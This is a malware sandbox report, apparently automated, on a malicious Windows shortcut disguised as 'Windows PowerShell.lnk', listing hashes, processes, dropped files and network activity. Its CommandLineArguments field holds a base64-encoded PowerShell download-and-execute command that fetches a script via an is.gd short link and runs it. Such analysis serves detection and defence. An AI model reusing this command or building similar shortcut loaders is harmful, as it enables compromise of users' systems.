| File name: | Windows PowerShell.lnk |
| Full analysis: | https://app.any.run/tasks/666e0cce-b438-484d-9f40-58033ceb81e6 |
| Verdict: | Malicious activity |
| Analysis date: | October 30, 2024, 13:02:37 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Unicoded, MachineID windows11, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Fri Feb 16 21:44:00 2024, atime=Thu Oct 3 09:53:00 2024, mtime=Fri Feb 16 21:44:00 2024, length=450560, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" |
| MD5: | 02E1F1EA7DC301147433623D31E5A294 |
| SHA1: | B882F489808747B6201B113D306A42D533CA229E |
| SHA256: | DE6D56AE01166232F2CB403C86D2DDF59D7654510100971FCD0FE59A3A8E9944 |
| SSDEEP: | 48:8FfT0u6AZyNswxtGTLqHLjOQIBJBSRC3+GU:8FfT0IyNhMLqHzIT5+G |
| .lnk | | | Windows Shortcut (100) |
|---|
| Flags: | IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2024:02:16 21:44:00+00:00 |
| AccessDate: | 2024:10:03 09:53:00+00:00 |
| ModifyDate: | 2024:02:16 21:44:00+00:00 |
| TargetFileSize: | 450560 |
| IconIndex: | (none) |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | powershell.exe |
| DriveType: | Fixed Disk |
| DriveSerialNumber: | 7CEA-241E |
| VolumeLabel: | - |
| LocalBasePath: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| RelativePath: | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| WorkingDirectory: | C:\Windows\system32 |
| CommandLineArguments: | -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA= |
| MachineID: | windows11 |
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 696 | cmd /c exit 86 | C:\Windows\System32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 86 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 860 | cmd /c exit 110 | C:\Windows\System32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 110 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 860 | cmd /c exit 46 | C:\Windows\System32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 46 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 944 | cmd /c exit 89 | C:\Windows\System32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 89 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 944 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESEE31.tmp" "c:\Users\admin\AppData\Local\Temp\CSC6ADC1DC896B34852886CC2A4CF5F2E6C.TMP" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 14.32.31326.0 | ||||
| 1204 | cmd /c exit 57 | C:\Windows\System32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 57 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 1428 | cmd /c exit 121 | C:\Windows\System32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 121 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 1452 | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\e1xmrxit.cmdline" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 | ||||
| 1572 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\.cmd"" | C:\Windows\System32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 1752 | cmd /c exit 114 | C:\Windows\System32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 114 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5516 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kn5nfhsm.yr2.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kh2qbkrc.ufn.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8FD5CTIJH0MTV6XXAX2L.temp | binary | |
MD5:07EE9A6A8413CBDDA59734DF3316994D | SHA256:3E90456FBAEF1FD7FF85119876D796064B12F3309E137280B39497F605330E14 | |||
| 1452 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC6ADC1DC896B34852886CC2A4CF5F2E6C.TMP | binary | |
MD5:52DC1F511261AFEE8F322D8AC3404AD7 | SHA256:FD4207E1C3715B73F48BF57B3E46D2F417A457A803ABDFB4660F7301957A7AA6 | |||
| 1452 | csc.exe | C:\Users\admin\AppData\Local\Temp\e1xmrxit.out | text | |
MD5:5A6BFF5D7DEDC1DDE7F323FD18AA15DF | SHA256:132C5B4CF8DE6B8383B660067B097A5EBDB41F49A79DB9B305BF7C197D36FE62 | |||
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:A53F192DD8488AF20DF310AAE1FE1B6A | SHA256:C8DFF2A4786DDABA5E4DB4BDE7AECABFC596215C5D6E58CB916AA240EDCFFA9F | |||
| 5516 | powershell.exe | C:\Users\admin\AppData\Local\Temp\.cmd | text | |
MD5:A07FCB39B340AD8DEA993A5F5C4D9064 | SHA256:EEB86BDD38DC4FA93046F3CC0E443018518B81828D34E5D1E75F3BD9AAB0F8A7 | |||
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zquxmdfi.rqv.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5516 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j4ups22e.bcj.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\e1xmrxit.cmdline | text | |
MD5:03548FA05C0CD3999D930348A6AA87FA | SHA256:68B88F4BCDEB62F9AE897E1A173F373B21DE91A598F2E377865F1224487E0EBD | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4360 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
6720 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
5516 | powershell.exe | GET | 301 | 104.25.234.53:80 | http://is.gd/jwr7JD | unknown | — | — | shared |
3916 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
5616 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
5616 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 2.23.209.143:443 | th.bing.com | Akamai International B.V. | GB | whitelisted |
4020 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
3916 | svchost.exe | 20.190.159.0:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3916 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
5516 | powershell.exe | 104.25.234.53:80 | is.gd | CLOUDFLARENET | US | shared |
5516 | powershell.exe | 104.25.234.53:443 | is.gd | CLOUDFLARENET | US | shared |
5516 | powershell.exe | 140.82.121.4:443 | github.com | GITHUB | US | shared |
5516 | powershell.exe | 185.199.110.133:443 | objects.githubusercontent.com | FASTLY | US | shared |
Domain | IP | Reputation |
|---|---|---|
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
is.gd |
| shared |
github.com |
| shared |
objects.githubusercontent.com |
| shared |
go.microsoft.com |
| whitelisted |
th.bing.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
5516 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
2172 | svchost.exe | Misc activity | ET INFO URL Shortener Service Domain in DNS Lookup (is .gd) |